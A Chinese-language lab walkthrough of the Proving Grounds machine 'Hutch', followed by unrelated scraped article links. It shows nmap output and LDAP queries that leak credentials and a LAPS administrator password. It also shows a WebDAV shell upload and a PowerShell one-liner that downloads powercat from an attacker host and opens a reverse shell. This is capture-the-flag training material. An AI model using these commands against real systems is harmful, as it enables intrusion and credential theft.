NMAP 
└─# nmap -p- -A -sS 192.168.196.122

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-16 01:39 UTC

Nmap scan report for 192.168.196.122

Host is up (0.071s latency).

Not shown: 65515 filtered tcp ports (no-response)

PORT      STATE SERVICE       VERSION

53/tcp    open  domain        Simple DNS Plus

80/tcp    open  http          Microsoft IIS httpd 10.0

| http-methods:

|_  Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT

|_http-server-header: Microsoft-IIS/10.0

|_http-title: IIS Windows Server

| http-webdav-scan:

|   Server Type: Microsoft-IIS/10.0

|   WebDAV type: Unknown

|   Server Date: Mon, 16 Dec 2024 01:43:18 GMT

|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK

|_  Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK

88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-16 01:42:25Z)

135/tcp   open  msrpc         Microsoft Windows RPC

139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn

389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)

445/tcp   open  microsoft-ds?

464/tcp   open  kpasswd5?

593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0

636/tcp   open  tcpwrapped

3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)

3269/tcp  open  tcpwrapped

5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

|_http-title: Not Found

|_http-server-header: Microsoft-HTTPAPI/2.0

9389/tcp  open  mc-nmf        .NET Message Framing

49666/tcp open  msrpc         Microsoft Windows RPC

49667/tcp open  msrpc         Microsoft Windows RPC

49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0

49674/tcp open  msrpc         Microsoft Windows RPC

49676/tcp open  msrpc         Microsoft Windows RPC

49692/tcp open  msrpc         Microsoft Windows RPC

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

OS fingerprint not ideal because: Missing a closed TCP port so results incomplete

No OS matches for host

Network Distance: 4 hops

Service Info: Host: HUTCHDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

| smb2-security-mode:

|   3:1:1:

|_    Message signing enabled and required

| smb2-time:

|   date: 2024-12-16T01:43:19

|_  start_date: N/A

TRACEROUTE (using port 135/tcp)

HOP RTT      ADDRESS

1   70.05 ms 192.168.45.1

2   70.02 ms 192.168.45.254

3   71.07 ms 192.168.251.1

4   71.44 ms 192.168.196.122

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 240.85 seconds

web的端口都访问了一下似乎没啥东西

但是通过nmap的扫描我们发现了ldap协议的端口

这个端口我也不是很会打 上hacktricks看看

在hacktricks的帮助下我们用这个命令 来获取信息

nmap -n -sV --script "ldap* and not brute" 192.168.196.122

经过我略微研究了一下ldap协议

我们还可以这么写 来收集里面的信息

ldapsearch -H ldap://192.168.196.122 -x -b "dc=hutch,dc=offsec" "(objectClass=*)"

然后我们在里面发现了一个很有意思的东西

信息泄露 它给出了密码 以及用户名





fmcsorley CrabSharkJellyfish192

那么我们怎么利用呢

看wp



关注我们nmap扫描的结果我们会发现他的80端口比较特别

我们观察到他支持cadaver 的特有方法proppatch

那么我们就可通过cadaver连接他



连接成功 并put 上传shell



开始反弹shell

在80端口放置我们的powercat.ps1 反弹shell脚本



然后再监听135端口

最后执行反弹shell命令

powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.45.250/powercat.ps1');powercat -c 192.168.45.250 -p 135 -e powershell

反弹成功



拿到第一个flag

接下来进入提权环节

不太懂了

看wp

ldapsearch -x -H 'ldap://192.168.196.122' -D 'hutch\fmcsorley' -w 'CrabSharkJellyfish192' -b 'dc=hutch,dc=offsec' "(ms-MCS-AdmPwd=*)" 用这个获取administrator的password4b&+cm$]otFTwr



python3 pyexec.py hutch.offsec/administrator:'4b&+cm$]otFTwr'@192.168.196.122



提权成功

边学边打花了5个小时左右

window不懂的太多了

Hutch PG walkthrough Intermediate window的更多相关文章

  1. pg和mysql对比

    作者:方圆链接:https://www.zhihu.com/question/20010554/answer/15863274来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出 ...

  2. PostgreSQL 与 MySQL 相比,优势何在?

    一. PostgreSQL 的稳定性极强, Innodb 等引擎在崩溃.断电之类的灾难场景下抗打击能力有了长足进步,然而很多 MySQL 用户都遇到过Server级的数据库丢失的场景——mysql系统 ...

  3. Mysql 和 Postgresql(PGSQL) 对比

    Mysql 和 Postgresql(PGSQL) 对比 转载自:http://www.oschina.net/question/96003_13994 PostgreSQL与MySQL比较 MySQ ...

  4. Pgsql和Mysql的对比

    工作中用过这两个数据库,但都不是太深入,仅限于用而已,但给我留下的印象就是Pgsql更好些,因为这两个库我都遇到过数据丢失的问题,前者我通过网上方法加自己的判断有惊无险的恢复了,而后者搜索各种资料加问 ...

  5. PostgreSQL与MySQL对比

    都属于开放源码的一员,性能和功能都在高速地提高和增强.MySQL AB的人们和PostgreSQL的开发者们都在尽可能地把各自的数据库改得越来越好,所以对于任何商业数据库使用其中的任何一个都不能算是错 ...

  6. JavaScript_解决safari浏览器window.open无法实现的问题

    解决 safari window.open 无法实现的问题 先说下问题是什么吧: safari 中没办法在回调函数里面执行window.open, 原因是safari的安全机制将其阻挡了(具体的原因可 ...

  7. Walkthrough: Arranging Controls on Windows Forms Using Snaplines

    https://msdn.microsoft.com/en-us/library/t5b5kc41(v=vs.110).aspx Spacing and Aligning Controls Using ...

  8. Burp Suite Walkthrough(英文版)

    Burp Suite is one of the best tools available for web application testing. Its wide variety of featu ...

  9. Burp Suite Walkthrough

    Burp Suite is one of the best tools available for web application testing. Its wide variety of featu ...

  10. Making your first driver - complete walkthrough(使用VisualDDK)

    This article describes how to create, build and debug your first driver using Visual Studio and Visu ...

随机推荐

  1. WebService WCF 请求通道在等待 00:00:58.9616639 以后答复时超时。增加传递给请求调用的超时值,或者增加绑定上的 SendTimeout 值。分配给此操作的时间可能是更长超时的一部分。

    查看使用什么方式调用的接口 如果是使用的 HttpWebRequest 请检查Timeout属性,默认值是 100,000 毫秒(100 秒)如果超过便会返回超时错误.

  2. 五、FreeRTOS学习笔记-任务创建和删除(动态方式)

    1任务控制块:保存任务的一些信息 (STM32的栈是由告高地址向低地址延伸的,由上向下生长) (STM32的堆是由告低地址向高地址延伸的,由下向上生长) 第一步申请内存 如下如所示步骤找到xTaskC ...

  3. Android之JNI开发

    JNIJNI是Java Native Interface的缩写,俗称Java本地接口,是Java语言提供的用于Java和C/C++相互沟通的机制,Java可以通过JNI调用本地的C/C++代码,本地的 ...

  4. Educational Codeforces Round 90 (Rated for Div2)

    Donut Shops 现在有两个超市,第一个超市的物品按件卖,每件商品的售价为\(a\)元:第二个超市的物品按箱卖,每箱有\(b\)件物品,每箱售价为\(c\)元,现在要让你买\(x\)和\(y\) ...

  5. 07C++选择结构(1)——教学

    一.基础知识 1.关系运算符 因为我们要对条件进行判断,必然会用到关系运算符: 名称 大于 大于等于 小于 小于等于 等于 不等于 符号 > >= < <= == != 关系表 ...

  6. GienTech动态|长沙共建交付中心启动、联合华为举办金融CXO沙龙、亮相大湾区多场科技盛会

    ---- GienTech动态 ---- 长沙共建交付中心启动仪式圆满举办 11月23日,由中电金信和太平洋人寿保险联合举办的长沙共建交付中心启动仪式顺利举行.太平洋人寿保险总经理助理.首席信息官黄鲲 ...

  7. 【C#】【平时作业】习题-7-继承、抽象与多态

    相关概念 什么是继承 继承定义了如何根据现有类创先新类的过程 任何类都可以从另外一个类继承 一个派生出来的子类具有这个类的所有公共属性和方法 类的继承机制 创建新类所根据的基础类称为基类或父类,新建的 ...

  8. maven打包时跳过TEST的方式汇总

    使用maven打包时如何跳过test,有以下几种方式 针对spring项目 <plugin> <groupId>org.apache.maven.plugins</gro ...

  9. Linux下如何获取CPU内存等硬件信息

    前言 在linux环境下,我们有时候需要写一些有关服务器配置信息的文档,这时候,如果我们本身没有这些这些服务器的购置信息,就需要借助命令查询出来,然后汇总到一个表格里,主要用于一些文档需要. Linu ...

  10. 关于Java的UUID

    UUID或者UNID或者UID,是一个统一唯一标识,可以用来标记文档.数据或其它需要唯一标识的东西.Java 5.0内置UUID的实现,见java.util.UUID. 下面代码是找到的2种实现方式, ...